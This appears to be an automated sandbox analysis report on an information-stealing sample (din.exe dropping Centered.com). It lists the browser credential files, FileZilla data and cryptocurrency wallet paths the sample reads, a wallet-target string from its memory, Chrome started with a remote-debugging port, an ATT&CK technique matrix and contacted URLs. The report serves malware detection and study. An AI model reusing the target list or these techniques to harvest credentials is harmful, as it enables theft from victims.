                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.comCode function: 16_2_00F3BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,16_2_00F3BCD2
                Source: C:\Users\user\Desktop\din.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831

                Stealing of Sensitive Information

                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *electrum*.*
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *exodus*.*
                Source: Centered.com, 00000010.00000002.2498840791.00000000013B4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: Centered.com, 00000010.00000002.2505513959.0000000004B6C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\minidumps\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\temporary\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\to-be-removed\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\tmp\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\crashes\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\bookmarkbackups\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\y572q81e.default\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\security_state\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Exodus\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Binance\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                Source: Centered.com Binary or memory string: WIN_81
                Source: Centered.com Binary or memory string: WIN_XP
                Source: Durable.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: Centered.com Binary or memory string: WIN_XPe
                Source: Centered.com Binary or memory string: WIN_VISTA
                Source: Centered.com Binary or memory string: WIN_7
                Source: Centered.com Binary or memory string: WIN_8
                Source: Yara match File source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR

                Remote Access Functionality

                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: 16.2.Centered.com.49c0000.2.unpack, type: UNPACKEDPE
                Source: Yara match File source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000002.2503014570.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000003.1613569602.0000000001A2D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000003.1613510624.00000000049CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: 00000010.00000002.2504659598.00000000048C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: Centered.com PID: 7244, type: MEMORYSTR
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com Code function: 16_2_00F82263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,16_2_00F82263
                Source: C:\Users\user\AppData\Local\Temp\322891\Centered.com Code function: 16_2_00F81C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,16_2_00F81C61
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                Credentials | Domains | Default Accounts | 1 Native API | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 4 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Extra Window Memory Injection | 2 Obfuscated Files or Information | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | 21 Input Capture | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 Extra Window Memory Injection | LSA Secrets | 11 Query Registry | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 12 Process Injection | 121 Masquerading | Cached Domain Credentials | 221 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 12 Process Injection | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph] Behavior Graph ID: 1581179, Sample: din.exe, Startdate: 27/12/2024, Architecture: WINDOWS, Score: 100

                Source | Detection | Scanner | Label | Link
                din.exe | 22% | Virustotal | | Browse
                din.exe | 55% | ReversingLabs | Win32.Trojan.Leonem |

                Source | Detection | Scanner | Label | Link
                C:\ProgramData\NGVAAIE3W4EU\5F3EKF | 0% | ReversingLabs | |
                C:\Users\user\AppData\Local\Temp\322891\Centered.com | 0% | ReversingLabs | |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                https://bijutr.shopIE3W4EU | 0% | Avira URL Cloud | safe |
                                                                                        https://docs.google.com/document/:chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://bijutr.shopIE3W4EUCentered.com, 00000010.00000002.2505513959.0000000004A9D000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000015.00000003.1844697158.000036EC0140C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://google-ohttp-relay-join.fastly-edge.com/iichrome.exe, 00000015.00000003.1848320022.000036EC01534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1848466750.000036EC01538000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.29.drfalse
                                                                                                high
                                                                                                https://google-ohttp-relay-join.fastly-edge.com/gj8Ychrome.exe, 00000015.00000003.1801561805.0000593800684000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 00000015.00000003.1810253687.000036EC00F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1889585937.000036EC009D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://anglebug.com/7714chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://unisolated.invalid/chrome.exe, 00000015.00000002.1889497169.000036EC009B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://photos.google.com?referrer=CHROME_NTPchrome.exe, 00000015.00000003.1813167152.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813304700.000036EC01224000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1813243843.000036EC011A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.google.com/chrome/tips/chrome.exe, 00000015.00000002.1889349825.000036EC00960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1886568019.000036EC001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888460148.000036EC00714000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888951306.000036EC00874000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://drive.google.com/?lfhs=2chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://anglebug.com/6248chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://ogs.google.com/widget/callout?eom=1chrome.exe, 00000015.00000003.1853603328.000036EC01C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://anglebug.com/6929chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://anglebug.com/5281chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.youtube.com/?feature=ytcachrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://issuetracker.google.com/255411748msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000015.00000002.1888831081.000036EC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887566216.000036EC004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1888720428.000036EC007B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890444399.000036EC00C44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000001A.00000003.1946356419.000033FC00280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://anglebug.com/7246chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://anglebug.com/7369chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://anglebug.com/7489chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000015.00000002.1889422702.000036EC00994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890526329.000036EC00C64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
